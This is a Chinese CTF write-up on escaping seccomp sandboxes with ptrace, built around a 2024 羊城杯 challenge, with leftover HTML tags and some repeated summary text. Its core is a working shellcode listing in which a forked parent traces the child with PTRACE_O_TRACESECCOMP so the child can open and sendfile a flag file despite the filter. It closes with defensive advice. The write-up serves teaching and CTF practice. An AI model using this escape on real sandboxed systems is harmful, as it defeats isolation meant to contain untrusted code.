基于ptrace的沙箱绕过技术详解<\/h1>

前言<\/h2>
本文详细讲解如何利用ptrace机制绕过基于seccomp的沙箱限制，特别是在2024羊城杯CTF比赛中遇到的hard-sandbox题目场景。该题目禁用了open和openat系统调用，同时阻止了32位系统调用(retfq也无法使用)，通过ptrace技术可以成功绕过这些限制。<\/p>

ptrace基础原理<\/h2>

ptrace概述<\/h3>

ptrace是Linux系统提供的一个系统调用，允许一个进程(父进程\/tracer)监视和控制另一个进程(子进程\/tracee)的执行，并能修改被监视进程的内存和寄存器。主要应用于：<\/p>

断点调试<\/li>
系统调用跟踪<\/li>

进程状态监控<\/li> <\/ol>

常见的调试工具如strace和gdb都是基于ptrace实现的。<\/p>

ptrace函数原型<\/h3>

#include<\/span> <sys\/ptrace.h><\/span>
<\/span><\/span><\/span><\/span>long<\/span> ptrace<\/span>(enum<\/span> __ptrace_request request, pid_t pid, void<\/span> *<\/span>addr, void<\/span> *<\/span>data);
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

request<\/code>: 要执行的操作类型<\/li>
pid<\/code>: 目标进程ID<\/li>
addr<\/code>: 要监控的目标内存地址<\/li>
data<\/code>: 保存读取或写入的数据<\/li>
<\/ul>
ptrace内核实现<\/h3>
ptrace的内核实现位于kernel\/ptrace.c<\/code>文件中，核心接口为：<\/p>
SYSCALL_DEFINE4(ptrace, long<\/span>, request, long<\/span>, pid, unsigned<\/span> long<\/span>, addr, unsigned<\/span> long<\/span>, data)
<\/span><\/span><\/code><\/pre>ptrace关键操作<\/h2>
建立追踪关系<\/h3>
在进行追踪前需要先建立追踪关系，相关request参数：<\/p>

PTRACE_TRACEME<\/strong>: tracee表明自己想要被追踪，自动与父进程建立追踪关系<\/li>
PTRACE_ATTACH<\/strong>: tracer附着一个进程tracee，建立追踪关系并发送SIGSTOP信号使其暂停<\/li>
PTRACE_SEIZE<\/strong>: 类似PTRACE_ATTACH但不暂停tracee<\/li>
PTRACE_DETACH<\/strong>: 解除追踪关系，tracee继续运行<\/li>
<\/ol>
常用request参数<\/h3>

PTRACE_POKETEXT\/PTRACE_POKEDATA<\/code>: 往内存地址写入数据<\/li>
PTRACE_PEEKTEXT\/PTRACE_PEEKDATA<\/code>: 从内存地址读取数据<\/li>
PTRACE_GETREGS<\/code>: 读取所有寄存器值<\/li>
PTRACE_SETREGS<\/code>: 设置寄存器值<\/li>
PTRACE_CONT<\/code>: 继续执行被跟踪的子进程<\/li>
PTRACE_O_TRACESECCOMP<\/code>: 跟踪seccomp事件<\/li>
<\/ul>
ptrace绕过seccomp沙箱的原理<\/h2>
关键发现：当追踪器被通知后，seccomp检查不会再次运行<\/strong>。这意味着：<\/p>

基于seccomp的沙箱必须禁止ptrace的使用<\/li>
如果沙箱没有完全禁止ptrace，可以通过ptrace机制逃逸<\/li>
第一次触发seccomp后，后续不会再次触发，沙箱限制失效<\/li>
<\/ol>
实际利用步骤<\/h2>
1. 父进程设置<\/h3>
父进程(tracer)需要完成以下操作：<\/p>

使用fork()<\/code>创建子进程<\/li>
通过PTRACE_ATTACH<\/code>附加到子进程<\/li>
使用PTRACE_SETOPTIONS<\/code>设置PTRACE_O_TRACESECCOMP<\/code>选项<\/li>
监控子进程状态并继续执行<\/li>
<\/ol>
2. 子进程执行<\/h3>
子进程(tracee)在被追踪后可以：<\/p>

尝试执行被沙箱限制的系统调用<\/li>
第一次会被seccomp拦截<\/li>
父进程处理后，后续调用将不受限制<\/li>
<\/ol>
3. 关键代码实现<\/h3>
# 父进程设置ptrace<\/span>
<\/span><\/span>shellcode =<\/span> shellcraft.<\/span>fork()
<\/span><\/span>shellcode +=<\/span> '''
<\/span><\/span><\/span>test eax,eax
<\/span><\/span><\/span>js exit
<\/span><\/span><\/span>mov r15,rax
<\/span><\/span><\/span>cmp rax,0
<\/span><\/span><\/span>je child_process
<\/span><\/span><\/span>
<\/span><\/span><\/span>parent_process:
<\/span><\/span><\/span>\/* PTRACE_ATTACH *\/
<\/span><\/span><\/span>xor r10d, r10d
<\/span><\/span><\/span>push 0x10
<\/span><\/span><\/span>pop rdi
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>mov rsi, r15
<\/span><\/span><\/span>push 101
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>
<\/span><\/span><\/span>\/* PTRACE_SETOPTIONS PTRACE_O_TRACESECCOMP *\/
<\/span><\/span><\/span>xor r10d, r10d
<\/span><\/span><\/span>mov r10b, 0x80
<\/span><\/span><\/span>mov edi, 0x1010101
<\/span><\/span><\/span>xor edi, 0x1014301
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>mov rsi, r15
<\/span><\/span><\/span>push 101
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>
<\/span><\/span><\/span>monitor_child:
<\/span><\/span><\/span>\/* wait4 *\/
<\/span><\/span><\/span>xor r10d, r10d
<\/span><\/span><\/span>xor edi, edi
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>xor esi, esi
<\/span><\/span><\/span>push 61
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>
<\/span><\/span><\/span>\/* PTRACE_CONT *\/
<\/span><\/span><\/span>xor r10d, r10d
<\/span><\/span><\/span>push 7
<\/span><\/span><\/span>pop rdi
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>mov rsi, r15
<\/span><\/span><\/span>push 101
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>jmp monitor_child
<\/span><\/span><\/span>
<\/span><\/span><\/span>child_process:
<\/span><\/span><\/span>\/* 尝试执行被限制的系统调用 *\/
<\/span><\/span><\/span>\/* open('.\/flag') *\/
<\/span><\/span><\/span>mov rax, 0x101010101010101
<\/span><\/span><\/span>push rax
<\/span><\/span><\/span>mov rax, 0x101010101010101 ^ 0x67616c662f2e
<\/span><\/span><\/span>xor [rsp], rax
<\/span><\/span><\/span>mov rdi, rsp
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>xor esi, esi
<\/span><\/span><\/span>push 2
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>
<\/span><\/span><\/span>\/* sendfile输出flag *\/
<\/span><\/span><\/span>push 0x50
<\/span><\/span><\/span>pop r10
<\/span><\/span><\/span>push 1
<\/span><\/span><\/span>pop rdi
<\/span><\/span><\/span>xor edx, edx
<\/span><\/span><\/span>mov rsi, rax
<\/span><\/span><\/span>push 40
<\/span><\/span><\/span>pop rax
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>
<\/span><\/span><\/span>\/* 失败则重试 *\/
<\/span><\/span><\/span>cmp rax,0
<\/span><\/span><\/span>jle child_process
<\/span><\/span><\/span>
<\/span><\/span><\/span>exit:
<\/span><\/span><\/span>mov rax, 60
<\/span><\/span><\/span>xor rdi, rdi
<\/span><\/span><\/span>syscall
<\/span><\/span><\/span>'''<\/span>
<\/span><\/span><\/code><\/pre>注意事项<\/h2>

执行顺序问题<\/strong>：父进程必须先完成ptrace设置，子进程才能绕过沙箱<\/li>
失败处理<\/strong>：子进程应循环尝试被限制的系统调用，直到父进程完成设置<\/li>
沙箱设计缺陷<\/strong>：沙箱应完全禁止ptrace使用，否则可能被绕过<\/li>
<\/ol>
完整利用流程<\/h2>

泄露必要的地址信息(如libc基址、堆地址)<\/li>
准备shellcode实现ptrace父子进程交互<\/li>
父进程设置ptrace跟踪并配置PTRACE_O_TRACESECCOMP<\/code><\/li>
子进程尝试执行被限制的系统调用(如open、sendfile)<\/li>
通过循环确保在沙箱被绕过后成功执行目标操作<\/li>
<\/ol>
防御建议<\/h2>

完全禁止沙箱进程使用ptrace<\/li>
使用更严格的seccomp策略<\/li>
考虑使用其他沙箱技术如namespace、cgroup等<\/li>
<\/ol>
总结<\/h2>
ptrace机制提供了强大的进程控制能力，但也可能被用于绕过安全限制。理解ptrace的工作原理对于安全开发和漏洞利用都至关重要。在实际应用中，应当谨慎评估ptrace的使用场景和安全影响。<\/p>

基于ptrace的沙箱绕过技术详解<\/h1>

ptrace基础原理<\/h2>

ptrace关键操作<\/h2>

实际利用步骤<\/h2>

总结<\/h2> ptrace机制提供了强大的进程控制能力，但也可能被用于绕过安全限制。理解ptrace的工作原理对于安全开发和漏洞利用都至关重要。在实际应用中，应当谨慎评估ptrace的使用场景和安全影响。<\/p>

总结<\/h2>
ptrace机制提供了强大的进程控制能力，但也可能被用于绕过安全限制。理解ptrace的工作原理对于安全开发和漏洞利用都至关重要。在实际应用中，应当谨慎评估ptrace的使用场景和安全影响。<\/p>